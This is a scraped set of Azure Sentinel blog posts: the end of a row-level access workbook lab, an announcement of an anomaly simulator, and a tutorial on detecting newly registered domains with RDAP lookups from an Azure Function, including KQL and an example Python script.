<P>&nbsp;</P> <LI-SPOILER><STRONG>Don't forget to save your workbook progress!</STRONG></LI-SPOILER> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_0-1633127548169.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314508i85ABC0F50FE316AB/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_0-1633127548169.png" alt="Beth_Bischoff_0-1633127548169.png" /></span></P> <P><A href="#" target="_blank" rel="noopener">"join"</A> flavor hint:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_2-1633127615832.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314510i085329F993EAF10F/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_2-1633127615832.png" alt="Beth_Bischoff_2-1633127615832.png" /></span></P> <P>&nbsp;</P> <P>Your sample deliverable from this exercise should be the ability to access the same workbook in Azure Sentinel as two different users from two different security groups and see entirely different sets of data.</P> <P>&nbsp;</P> <LI-SPOILER> <P>Here are a couple of simple sample queries to start with for your workbook:</P> <LI-CODE lang="sql">adx("{ADXClusterName.region/DatabaseName}").Plant_Data
| join (CommonSecurityLog) on $left.IPAddress == $right.DestinationIP
| where TimeGenerated &gt;= ago(7d)</LI-CODE><LI-CODE lang="sql">adx("{ADXClusterName.region/DatabaseName}").Plant_Data
| join (CommonSecurityLog) on $left.IPAddress == $right.DestinationIP
| summarize Successful_Connection = countif(DeviceAction=="Success" or DeviceAction=="Successful" or DeviceAction=="accept"), Failed_Connection = countif(DeviceAction=="Failure") by DeviceEventClassID, DestinationIP</LI-CODE> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Beth_Bischoff_3-1633207074756.png" style="width: 999px;"><img 
src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/314612iEAA2715CA65B5F2F/image-size/large?v=v2&amp;px=999" role="button" title="Beth_Bischoff_3-1633207074756.png" alt="Beth_Bischoff_3-1633207074756.png" /></span></P> </LI-SPOILER> <P>We hope you had fun with this lab exercise and can think of some other uses for this ability to provide Row Level Access Restrictions in Azure Sentinel using Azure Data Explorer!</P> <P>&nbsp;</P> <P>Special thanks to co-authors <LI-USER uid="703683"></LI-USER> and <LI-USER uid="94294"></LI-USER>, and also thanks to <LI-USER uid="592173"></LI-USER>, whose post <A href="https://gorovian.000webhostapp.com/?exam=t5/microsoft-365-defender/blog-series-limitless-advanced-hunting-with-azure-data-explorer/ba-p/2328705" target="_blank" rel="noopener">Limitless Microsoft Defender for Endpoint Advanced Hunting with Azure Data Explorer (ADX)</A> was the inspiration for this solution!</P> Thu, 07 Oct 2021 05:19:59 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/simple-row-based-access-workbook-lab-walk-through-with-azure/ba-p/2804446 Beth_Bischoff 2021-10-07T05:19:59Z The Azure Sentinel Anomalies Simulator https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/the-azure-sentinel-anomalies-simulator/ba-p/2738393 <H2>Introduction</H2> <P>&nbsp;</P> <P>We are pleased to announce the “Unusual Mass Downgrade AIP Label” anomaly simulator, the first in a series of simulators for Azure Sentinel Anomalies. This simulator will populate the table in Azure Sentinel monitored by the relevant anomaly rule with simulated data. This simulated data will trigger an anomaly. You can review the anomaly by querying the Anomalies table for the anomaly rule’s name. 
These simulators will enable users to validate that an anomaly rule works in their Sentinel workspace.</P> <P>&nbsp;</P> <H2>What is the Unusual Mass Downgrade AIP rule?</H2> <P>&nbsp;</P> <P>The anomaly rule "Unusual Mass Downgrade AIP Label" detects an unusually high volume of label-downgrade activity in Azure Information Protection (AIP) logs. It considers "AIP" workload records for a given number of days and determines the sequence of activity performed on documents, along with the label applied, to classify unusual volumes of downgrade activity. Anomalies are saved to the Anomalies table in your Azure Sentinel workspace. No alerts or incidents are generated by these anomalies. You can use anomalies to correlate with other signals to build threat detections, investigate an incident, or hunt for malicious actors.</P> <H2>Value for your Organization</H2> <P>&nbsp;</P> <P><STRONG>End to End visibility -</STRONG> Enables analysts to gain a deeper understanding of the anomaly rules by injecting simulated data while limiting impacts to production security operations. Familiarization with signals such as those identified in an anomaly rule can assist in production detection and deepen the skills necessary to effectively identify malicious behaviors.</P> <P>&nbsp;</P> <P><STRONG>Training, Building SOPs, Workflows, Playbooks</STRONG> – SOC operations rely on standardized responses; new rules require periods of observation by analysts to become familiar with the signals and indicators. The anomaly simulator provides a mechanism whereby analysts can preview the associated anomaly information broadly without compromising normal production analysis. Subsequent development of SOPs, Workflows and playbooks can complement training programs and overall knowledge enhancement.</P> <H2>Configuration Steps:</H2> <P>&nbsp;</P> <P><EM><STRONG>Source code</STRONG></EM> for the anomalies simulator is available on the Azure Sentinel <A href="#" target="_blank" rel="noopener"><STRONG><EM>Tools Simulators</EM></STRONG> GitHub </A>space.</P> <P>&nbsp;</P> <H3><FONT size="3"><STRONG>Configure the Script</STRONG></FONT></H3> <UL> <LI>Edit the <EM>writetoLA-AIPMassDowngrade.txt</EM> file found on GitHub and save it as a PowerShell script (.ps1)</LI> </UL> <P>**Ensure your Log Analytics ID, Workspace ID and Tenant ID are correctly entered into the script</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Edit-PS.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/309464iFEE567E0B10E417E/image-size/large?v=v2&amp;px=999" role="button" title="Edit-PS.gif" alt="Edit-PS.gif" /></span></P> <P>&nbsp;</P> <P><STRONG>Execute the Script</STRONG></P> <UL> <LI>Open your Azure Sentinel workspace and the Command Line Interface (CLI) <UL> <LI>Upload the .ps1 and .csv files</LI> <LI>Execute the script in the Azure CLI with the following command line: <STRONG>&amp; './WriteToLA - AIPMassDowngrade.ps1'</STRONG></LI> </UL> </LI> </UL> <P>&nbsp;</P> <LI-CODE lang="powershell">&amp; './WriteToLA - AIPMassDowngrade.ps1'</LI-CODE> <P>&nbsp;</P> <P><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Importcsv.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/309465iC4047DB08D423C11/image-size/large?v=v2&amp;px=999" role="button" 
title="Importcsv.gif" alt="Importcsv.gif" /></span><BR /></STRONG></P> <P>&nbsp;</P> <P><STRONG>Review the InformationProtectionLogs_CL table entries</STRONG></P> <P>KQL query:</P> <LI-CODE lang="sql">InformationProtectionLogs_CL
| where ProtectionType_s == "Simulated" and Operation_s == "AcquireLicense" and Activity_s == "DowngradeLabel"</LI-CODE> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="InfoPro_CL.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312455iC7A2FE2152580E69/image-size/large?v=v2&amp;px=999" role="button" title="InfoPro_CL.png" alt="InfoPro_CL.png" /></span></P> <P class="lia-indent-padding-left-30px"><STRONG>Note</STRONG>: 62 simulated entries related to the <EM><STRONG>"Unusual Mass Downgrade AIP Label"</STRONG></EM> anomaly have been added.</P> <P>&nbsp;</P> <P><STRONG>Review the Anomalies table entries</STRONG></P> <P>KQL query:</P> <LI-CODE lang="sql">Anomalies
| where RuleName contains "(Preview) Unusual mass downgrade AIP label"</LI-CODE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Query Results.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312459iAD462EDBD7E40A63/image-size/large?v=v2&amp;px=999" role="button" title="Query Results.png" alt="Query Results.png" /></span></P> <P>&nbsp;</P> <P>The "contains" operator in the KQL query allows for viewing results in both Flighting and Production status. Results from the script will be immediately visible in the InformationProtectionLogs_CL table, but it may take up to 12 hours to show results in the Anomalies table, depending on when the data is imported with the PS script.</P> <P>&nbsp;</P> <P>Reply in the comments section with questions related to this release, as well as other anomaly simulators you would like to see.</P> Thu, 30 Sep 2021 15:41:26 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/the-azure-sentinel-anomalies-simulator/ba-p/2738393 ChuckW 2021-09-30T15:41:26Z Querying WHOIS/Registration Data Access Protocol (RDAP) with Azure Sentinel and Azure Functions https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/querying-whois-registration-data-access-protocol-rdap-with-azure/ba-p/2774502 <P>With the amazing increase in domains and top-level domains (TLDs) on the Internet, it's difficult to know just where our users are going. Newly registered domains, domain generation algorithms, and typo-squatting are all tactics used by adversaries to compromise users. Recently I was talking with a customer about Azure Sentinel and they had a question about if and how they could raise an alert when a user received an email from a newly registered domain (by their definition this was any domain that had been registered in the last thirty days). While we don't have a built-in feature for this in Sentinel, it is possible to extend Sentinel to include this type of functionality. This blog post is about one way that such an extension could be created.</P> <P>&nbsp;</P> <H2><STRONG>Domain registration history</STRONG></H2> <P>&nbsp;</P> <P>First off, we need to understand domain registrations in general. To be usable on the Internet, all domain names must be registered so they can be propagated throughout the global DNS world. This information is created with a domain registrar or their resellers, who are accredited by the Internet Corporation for Assigned Names and Numbers (ICANN), a not-for-profit public-benefit corporation that defines the policies and rules around domain registration. 
A simplified process flow is that when a domain is requested, the registrar will check if the domain name is available for registration and, if so, will then create a "WHOIS" record with the domain name registrant's information. WHOIS is a protocol defined by the Internet Engineering Task Force (IETF) in <A href="#" target="_blank" rel="noopener">RFC3912</A>. WHOIS is a TCP based connection using port 43 and responds in a human readable format. Each registrar maintains its own WHOIS infrastructure, and you often must know just which registrar is authoritative for a particular domain. To keep the telephone book analogy going, it's kind of like knowing that a person named "Matt Egen" exists somewhere in a telephone book in the world, but without knowing exactly <EM>where</EM> he is, you'd have to check all the telephone books around the world to find him. While this is fine for looking up occasional data (and back in 1985 there were a lot fewer domains, as well as far fewer Top-Level Domains (TLD) like .com, .net, .org, etc.), it’s rather difficult to automate the process as the data isn't designed to be read by a machine. To counter this and account for not only the growing domain count but the invention of new "Generic Top Level Domains" (gTLD) like .store, .app, etc., ICANN and the Internet Engineering Task Force (IETF) came up with a new protocol called the <A href="#" target="_blank" rel="noopener">Registration Data Access Protocol</A> (RDAP). RDAP is a REST API with the same information as the traditional WHOIS service, except its data is returned in a standardized JSON format. 
This makes it rather straightforward in parsing the returned data (although it still maintains a problem in finding the correct RDAP server / source to begin with, but we can deal with that) and automating the process.</P> <P>&nbsp;</P> <H2><STRONG>Extending Azure Sentinel with Azure Functions</STRONG></H2> <P>&nbsp;</P> <P>Azure Sentinel offers us several tools we can use to automate tasks.&nbsp; One method is to use Playbooks which are based on Azure Logic Apps and these provide an outstanding solution for creating a visual flow in your automation process.&nbsp; We could have used one here (in fact, in the v1 of this solution I did exactly that), however, there is another method we can use as well:&nbsp; Azure Functions. Azure Functions is a cloud service available on-demand that provides all the continually updated infrastructure and resources needed to run your applications. You focus on the pieces of code that matter most to you, and Functions handles the rest. Functions provides serverless compute for Azure. 
You can use Functions to build web APIs, respond to database changes, process IoT streams, manage message queues, and more. In this case, we’re going to use an Azure Function with a timer trigger to handle our RDAP query and run it on a regular schedule.</P> <P>&nbsp;</P> <H2><STRONG>Architecture and process flow</STRONG></H2> <P>&nbsp;</P> <P>The example follows a straightforward flow:</P> <P>&nbsp;</P> <OL> <LI>On a regular schedule the Azure Function will trigger.</LI> <LI>The Function will query the Azure Sentinel instance and call a Function which will get new domain names. We’re using a Function in Sentinel because we want it to be flexible and maintainable <EM>outside</EM> of the Azure Function. This means we can modify it whenever we have / want a new source of domain names. In this example we’re using the domains returned from the DeviceEvents table which comes from the Microsoft Defender 365 data connector. However, by using a Function it could be from <U>any</U> or multiple source(s) so long as it’s returned in the expected format. By using a Function and leveraging joins, we can handle all the sources we want.</LI> <LI>Using the returned domains, we will then call the RDAP “Bootstrap” service. This is a special list of all of the gTLDs and their requisite RDAP server endpoints. Think of this as a phone book of phone books.</LI> <LI>After getting the correct RDAP server, we then query it and get the results in JSON notation.</LI> <LI>We take the relevant information (in this example this is <U>just</U> the registration <STRONG>date</STRONG>) and then call back into our Azure Sentinel instance to store the data in a custom log table.</LI> <LI>Finally, there is an Analytic Rule which runs against this custom log and, if it finds a domain that is younger than the set criteria, raises an alert.</LI> </OL> <P>&nbsp;</P> <H2><STRONG>Required Information for this example</STRONG></H2> <P>&nbsp;</P> <P>Since we’re 
going to be accessing data in an Azure Sentinel instance we need some information to enable that.</P> <P>&nbsp;</P> <H3><STRONG>Creating the Sentinel Function</STRONG></H3> <P>&nbsp;</P> <P>To retrieve the domain names that we want to resolve, we’re using a Sentinel Function. While it has a similar name to an Azure Function, it’s different. A Sentinel Function is written in the Kusto Query Language (KQL) and is a query that you save and then call later using an alias. You can use a Function in place of a table and use it like any other table. I’m not going to go too deep into the use cases or creation of Functions, but for our case we’re using it as a convenient tool so that we can maintain the query outside of our Azure Function and tune / adjust it as needed for different environments. If you would like to learn more about Sentinel Functions, you can read about them here: <A href="#" target="_blank" rel="noopener">Functions in Azure Monitor log queries - Azure Monitor | Microsoft Docs</A>. For this use case, we’re going to show a straightforward example that calls into the DeviceNetworkEvents table, cleans up some of the data, checks that it’s not in an exclusion list, and finally that it has not already been looked up in the last 90 days.</P> <P>&nbsp;</P> <PRE>// Function Name: GetDomainsForRDAP<BR />// ExcludedDomains is a dynamic list of domains and TLDs to not bother searching for,<BR />// either because we already trust them, or perhaps we know they don’t have an RDAP server implementation.<BR />let ExcludedDomains = dynamic(["cn","io", "ms", "microsoft.com","somerandomsender.com"]);<BR />// Query the DeviceNetworkEvents table for the last 1 hour<BR />DeviceNetworkEvents<BR />| where TimeGenerated &gt;= ago(1h)<BR />| where isnotempty(RemoteUrl) // only return records that have a RemoteUrl value<BR />// A little cleanup just in case<BR />| extend parsedDomain = case(RemoteUrl contains "//", tostring(parse_url(RemoteUrl).Host), RemoteUrl) // handle scenarios where the RemoteUrl includes protocol data (e.g. http/s, etc.); tostring() so both case() branches are strings<BR />| extend cleanDomain = tostring(split(parsedDomain,"/")[0]) // throw away anything after the first “/” character<BR />| extend splitDomain = split(cleanDomain,".") // split the domain name on the “.”<BR />| extend Domain = tolower(strcat(splitDomain[array_length(splitDomain)-2],".",splitDomain[array_length(splitDomain)-1])) // recombine just the last two parts of the domain (the registered name and the TLD)<BR />| extend TLD = tostring(splitDomain[array_length(splitDomain)-1]) // grab the TLD so we can see if it’s in the exclusion list along with the domain<BR />| where TLD !in(ExcludedDomains)<BR />| where Domain !in(ExcludedDomains)<BR />| summarize DistinctDomain = dcount(Domain) by Domain // de-duplicate the list<BR />| project Domain // return just the domain<BR />// Now join the results above to our table of already resolved domains. We don’t want to waste cycles querying for things we already know about<BR />//| join kind=leftanti (ResolvedDomains_CL<BR />//| where TimeGenerated &gt;= ago(90d)) on $left.Domain == $right.domainName_s // Uncomment these lines after the FIRST run of the Azure Function.</PRE> <P>&nbsp;</P> <P>One thing you may notice in the above Sentinel Function: the last two lines are commented out. This is because until the Azure Function runs the first time, the “ResolvedDomains_CL” custom log table doesn’t exist and this Sentinel Function will fail. After successfully running the Azure Function one time, you should then uncomment the last two lines.</P> <P>&nbsp;</P> <H3><STRONG>The Azure Function</STRONG></H3> <P>&nbsp;</P> <P>Now that we have the Sentinel Function out of the way, let’s talk about the Azure Function. 
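</P>
<P>Before moving on, here is an added example that is not the blog's C# Azure Function: the Python below does offline what steps 2 to 5 of the process flow and the GetDomainsForRDAP function describe. It normalizes RemoteUrl values the way the KQL does (host only, last two labels, lower-cased), applies the exclusion list and the already-resolved filter, picks the RDAP server from a bootstrap structure in the shape of the IANA file (RFC 7484), reads the registration event from an RDAP domain response, and marks domains registered within the last 30 days. The URLs, the bootstrap entries, the RDAP responses and the fixed clock are all constructed for the example; the real bootstrap file is https://data.iana.org/rdap/dns.json and the real function would GET the computed RDAP URL instead of reading a dictionary.</P>

```python
"""Added example (not the blog's C# Azure Function): domain clean-up as in the
GetDomainsForRDAP function, RDAP bootstrap lookup, and the registration-age check,
run offline against constructed data."""
from datetime import datetime, timedelta, timezone
from urllib.parse import urlparse

# Same exclusion list as the Sentinel Function above.
EXCLUDED = {"cn", "io", "ms", "microsoft.com", "somerandomsender.com"}

# Constructed RemoteUrl values as DeviceNetworkEvents might carry them.
SAMPLE_URLS = [
    "https://www.Fresh-Lure.com/login",
    "oldvendor.net/update",
    "https://docs.microsoft.com/x",
    "http://shop.example.store/",
    "https://portal.contoso.io/",
]

# Constructed excerpt in the shape of the IANA RDAP bootstrap file (RFC 7484):
# each service entry is [[tlds...], [base URLs...]]. The URLs are placeholders.
BOOTSTRAP = {"services": [
    [["com", "net"], ["https://rdap.example-registry.test/"]],
    [["store"], ["https://rdap.store-registry.test/rdap/"]],
]}

# Constructed RDAP domain responses keyed by domain; the real function would GET them.
SAMPLE_RDAP = {
    "fresh-lure.com": {"objectClassName": "domain", "ldhName": "FRESH-LURE.COM", "events": [
        {"eventAction": "registration", "eventDate": "2021-09-15T08:30:00Z"},
        {"eventAction": "expiration", "eventDate": "2022-09-15T08:30:00Z"}]},
    "oldvendor.net": {"objectClassName": "domain", "ldhName": "OLDVENDOR.NET", "events": [
        {"eventAction": "registration", "eventDate": "2005-03-02T00:00:00Z"}]},
    "example.store": {"objectClassName": "domain", "ldhName": "EXAMPLE.STORE", "events": [
        {"eventAction": "last changed", "eventDate": "2020-01-01T00:00:00Z"}]},  # no registration event
}

NOW = datetime(2021, 10, 1, tzinfo=timezone.utc)  # fixed clock so results are reproducible


def normalize_domain(remote_url):
    """Mirror the KQL: host via URL parsing when a scheme is present, otherwise the text
    before the first '/', then only the last two labels, lower-cased. None if no domain."""
    host = urlparse(remote_url).hostname or "" if "//" in remote_url else remote_url.split("/")[0]
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2 or not labels[-1]:
        return None
    return ".".join(labels[-2:])


def candidate_domains(remote_urls, already_resolved=frozenset()):
    """Distinct domains whose TLD and name are not excluded and that were not resolved in
    the last 90 days (the commented-out leftanti join in the Sentinel Function)."""
    out = set()
    for url in remote_urls:
        domain = normalize_domain(url)
        if domain is None:
            continue
        tld = domain.rsplit(".", 1)[-1]
        if tld in EXCLUDED or domain in EXCLUDED or domain in already_resolved:
            continue
        out.add(domain)
    return sorted(out)


def rdap_query_url(domain, bootstrap=BOOTSTRAP):
    """Bootstrap step: the RDAP base URL for the domain's TLD plus the /domain/<name>
    query path (RFC 7482). None when no RDAP service is listed for the TLD."""
    tld = domain.rsplit(".", 1)[-1]
    for tlds, urls in bootstrap["services"]:
        if tld in tlds:
            return urls[0].rstrip("/") + "/domain/" + domain
    return None


def registration_date(rdap_response):
    """The 'registration' event of an RDAP domain object as an aware datetime, or None."""
    for event in rdap_response.get("events", []):
        if event.get("eventAction") == "registration":
            return datetime.fromisoformat(event["eventDate"].replace("Z", "+00:00"))
    return None


def is_newly_registered(rdap_response, now=NOW, max_age_days=30):
    """The analytic-rule test: registered within max_age_days. Unknown age is not flagged."""
    registered = registration_date(rdap_response)
    return registered is not None and now - registered < timedelta(days=max_age_days)


def triage(remote_urls, rdap_responses, now=NOW, max_age_days=30):
    """Rows the Azure Function would write to ResolvedDomains_CL, plus the alert decision:
    {domain: (rdap_url, registration_iso_or_None, newly_registered)}."""
    rows = {}
    for domain in candidate_domains(remote_urls):
        url = rdap_query_url(domain)
        response = rdap_responses.get(domain)
        if url is None or response is None:
            continue
        registered = registration_date(response)
        rows[domain] = (url, registered.isoformat() if registered else None,
                        is_newly_registered(response, now, max_age_days))
    return rows


if __name__ == "__main__":
    for domain, row in triage(SAMPLE_URLS, SAMPLE_RDAP).items():
        print(domain, row)
```

<P>Two caveats carry over from the KQL: keeping only the last two labels collapses hosts under multi-label public suffixes (co.uk and the like) to the suffix itself, so a public-suffix list is the fix if those matter in your environment; and a response with no registration event yields an unknown age that is not flagged here, which is a choice worth revisiting when you write the analytic rule.</P>
<P>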
As noted before, while having a similar name to a Sentinel Function, Azure Functions are completely different. Azure Functions is a cloud service available on-demand that provides all the continually updated infrastructure and resources needed to run your applications. You focus on the pieces of code that matter most to you, and Functions handles the rest. Azure Functions can be written in an array of different stacks including .NET, Node.js, Python, Java, and even PowerShell Core, and can be hosted on either Windows or Linux infrastructure. In this case we’re using .NET as the stack, the language is C#, and the infrastructure is Windows.</P> <P>&nbsp;</P> <P>To <EM>read</EM> data from Azure Sentinel, we need to create Azure AD application credentials with permission to the Azure Sentinel instance.</P> <P>&nbsp;</P> <H3><STRONG>Creating an Azure AD Application with read permissions to Azure Sentinel</STRONG></H3> <P>&nbsp;</P> <P>This blog post is already getting a little long, so rather than rewrite the steps to create an Azure AD Application, I’m just going to provide a link to my peer Rin Ure’s great blog post on the APIs and creating credentials: <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/access-azure-sentinel-log-analytics-via-api-part-1/ba-p/1248377" target="_blank" rel="noopener">Access Azure Sentinel Log Analytics via API (Part 1) - Microsoft Tech Community</A>. The specific permission that we want to make sure we grant to the application is covered in the linked article under the “Give the AAD Application permissions to your (Sentinel) Log Analytics Workspace” section. After following the steps in that article, we will have two of the settings that we will need for the RDAP Query engine: the Client ID and the Client Secret. We will be using these later when we configure the Azure Function.</P> <P>&nbsp;</P> <P>Ok, so now we have what we need to read the data, but what about writing back our results? 
To <EM>write</EM> data to the Azure Sentinel instance, we need the Workspace ID and either the Primary or Secondary key for the workspace.</P> <P>&nbsp;</P> <H3><STRONG>Getting the Workspace ID and Key for Azure Sentinel</STRONG></H3> <P>&nbsp;</P> <P>Azure Sentinel uses Log Analytics as the underlying data store.&nbsp; To write data to the Log Analytics workspace, we need the workspace ID and Key and can access these very simply in Azure Sentinel. In Sentinel, go to Settings...</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_0-1632321618709.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312070i672FD0F34AB2E8FE/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_0-1632321618709.png" alt="MattEgen_0-1632321618709.png" /></span></P> <P>&nbsp;</P> <P>Then, select “Workspace Settings” from the top of the resulting page...</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_1-1632321618715.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312071i55B8F884D3CA53E9/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_1-1632321618715.png" alt="MattEgen_1-1632321618715.png" /></span></P> <P>&nbsp;</P> <P>And finally, select “Agents Management”</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_2-1632321618719.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312072iCC53CD604134612A/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_2-1632321618719.png" alt="MattEgen_2-1632321618719.png" /></span></P> <P>&nbsp;</P> <P>This will take you to a screen that will show you the Workspace ID and two keys, a primary and secondary, that can be used to send data to the workspace...</P> <P>&nbsp;</P> <P><span 
class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_3-1632321618721.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312073iE52DEA3DC0DF95A7/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_3-1632321618721.png" alt="MattEgen_3-1632321618721.png" /></span></P> <P>&nbsp;</P> <P>We can use either the primary or the secondary key; it doesn’t matter which one we choose. Just remember to copy and save the Workspace ID and one of the keys, as we’re going to need them in the next section.</P> <P>&nbsp;</P> <P>Now that we have the values we need to access Azure Sentinel, we are going to use them in our Azure Function by storing them in Application Settings.</P> <P>&nbsp;</P> <H3><STRONG>Azure Function – Application Settings</STRONG></H3> <P>&nbsp;</P> <P>As an Azure Function, the example can be configured via Application Settings. Application settings are encrypted at rest and transmitted over an encrypted channel. Application Settings are exposed as environment variables for access by the application at runtime. This allows us to store keys and values in the Azure Function without having to store them in code. There are two advantages to this: 1) we’re not storing secrets in the actual code itself and 2) we can change them if we need to later.</P> <P>&nbsp;</P> <P>For this Function we use the following Application Settings:</P> <P>&nbsp;</P> <PRE>"SharedKey": "[LogAnalytics WorkSpace Primary or Secondary Key]",<BR />"WorkspaceID": "[LogAnalytics Workspace ID]",<BR />"LogName": "[The name of the custom log to store results. 
Recommend:ResolvedDomains]",<BR />"tenant_id": "[AzureAD TenantID]",<BR />"client_id": "[AzureAD Application Client ID]",<BR />"client_secret": "[AzureAD Application Client Secret]",<BR />"grant_type": "[Grant Type for Bearer Token]",<BR />"resource": "[Resource URL for Bearer Token]",<BR />"query_string": "[The Sentinel function name to call]"</PRE> <P>&nbsp;</P> <P>These values are used in the C# code that does the actual work in the Azure Function and are populated from the Application Settings into the code at runtime. This makes it very easy for us to change settings without having to rewrite or redeploy code.&nbsp; After deploying the application to an Azure Function, we configure the Application Settings on the Configuration blade...</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_4-1632321618734.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312075i38139A051C77F7E2/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_4-1632321618734.png" alt="MattEgen_4-1632321618734.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>For each of the settings, simply click the “New Application Setting” button and enter the name and value of the setting...</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_5-1632321618737.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312074iF3FC6BA5A987DBDC/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_5-1632321618737.png" alt="MattEgen_5-1632321618737.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Now let’s look at the code and how we can deploy it to an Azure Function.</P> <P>&nbsp;</P> <H3><STRONG>RDAP Query Engine C# Code</STRONG></H3> <P>&nbsp;</P> <P>I’m not going to go through every line in the code, but instead leave that as an exercise for the reader.&nbsp; Keep in mind 
this is an&nbsp;<EM>example</EM> and as such could probably be improved.&nbsp;The code is hosted on GitHub here: <A href="#" target="_blank" rel="noopener">Azure-Sentinel/Tools/RDAP/RDAPQuery at master · Azure/Azure-Sentinel (github.com)</A>. However, I’m going to cover the main function and the overall structure.</P> <P>&nbsp;</P> <P>“<STRONG>CheckDomains</STRONG>”</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_6-1632321618745.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312076i50482FB43848439C/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_6-1632321618745.png" alt="MattEgen_6-1632321618745.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>CheckDomains is the initialization point for the code and is called by the Azure Function framework based on a Timer trigger (in fact CheckDomains is an alias for the internal “Run” function that Azure Functions is calling). The timer is set to fire at a set period of time (default every five minutes) and in turn makes all of the other calls to get authentication, retrieve data from Sentinel, query RDAP, and finally write the results back to Sentinel. Let’s map out this function...</P> <P>[create a visio of the function?]</P> <P>&nbsp;</P> <P><STRONG>&nbsp;“QueryData”</STRONG></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_7-1632321618756.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312078iD6D6FF0857298763/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_7-1632321618756.png" alt="MattEgen_7-1632321618756.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>One of the first things that CheckDomains does is call the QueryData function, which is responsible for calling into Azure Sentinel and retrieving any new domains to look up. 
It takes one parameter, which is the actual query to execute. Since querying the data in Azure Sentinel requires us to authenticate, it first retrieves an OAuth bearer token (via a call to “GetBearerToken()”) and then uses it in the subsequent call to the Log Analytics API.&nbsp; If we receive a successful status code from the call, we then deserialize the results into a QueryResults object and return it to the CheckDomains function.</P> <P>&nbsp;</P> <P>After calling QueryData, we run a ForEach() loop over the results, do a little cleanup (by splitting out the top-level domain (.com, .net, etc.) with a split() function) and then call BootStrapTLD.</P> <P><STRONG>&nbsp;</STRONG><STRONG>&nbsp;</STRONG></P> <P><STRONG>BootStrapTLD()</STRONG></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_8-1632321618765.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312077iBB4F7BB879099A35/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_8-1632321618765.png" alt="MattEgen_8-1632321618765.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>BootStrapTLD takes the passed-in top-level domain (TLD) and uses it to call the IANA bootstrap URL at <A href="#" target="_blank" rel="noopener">https://data.iana.org/rdap/dns.json</A> (this is hardcoded as it’s supposed to never change), which is a JSON file that has all the different TLDs mapped out with the appropriate RDAP server URL that we can call to get the detailed information about the domain.&nbsp; We make a call to the JSON file and then deserialize it into a Services object. Since we deserialized the entire list, we then run a foreach loop over the returned values to check for a match with the TLD we’re searching for. 
